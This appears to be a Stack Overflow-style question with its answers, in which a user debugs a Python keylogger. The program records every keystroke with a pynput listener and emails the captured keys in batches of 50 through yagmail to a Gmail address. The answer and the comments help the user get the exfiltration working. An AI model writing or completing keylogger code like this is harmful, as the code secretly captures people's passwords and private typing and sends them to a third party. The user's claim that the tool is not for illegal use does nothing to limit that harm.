# Adding pressed key to a array everytime and clears everytime the array is 50

Tags: python

So I am making a keylogger (no iligel stuf) and everytime the user presses a key it should add the key to the array and when the array hits 50 keys it should reset. Right now all this does is do the `send(key)` every 50 key pressed but the array is empty. How do I fix this?

```
count = 0
keys = []

listToStr = ' '.join([str(elem) for elem in keys])

message = """\
My list is {}.
"""

def send(keys):
    print('test')
    yag = yagmail.SMTP('barackobama@gmail.com', 'ilovepizza')
    yag.send('donaldtrump@gmail.com', 'KeNogger', message.format(listToStr))

def on_press(key):
    global keys, count
    print(key)
    count += 1

    if count >= 50:
        count = 0
        send(keys)
        keys = []

def on_release(key):
    if key == Key.esc:
        return False

with Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()
```

Answer (score 0):

You need to add your `key` to the `keys` list. You can do this with the `append` method:

```
count = 0
keys = []
message = """\
My list is {}.
"""

def on_press(key):
    global keys, count
    print(key)
    count += 1
    # add the key to the list
    keys.append(key)

    if count >= 50:
        count = 0
        send(keys)
        keys = []
```

Comment: the output is still just this: https://gyazo.com/b3bf2644b8d772964448b7384301ba49

Comment: Does `key` get printed when `on_press` is called?

Comment: The only other thing I can think of to check is to `print(keys)` after you enter your `if count >= 50:` block. If `keys` is what you'd expect then I'd look at your `send` function.

Comment: I got it to work. I changed the message.format(listToStr) to str(keys)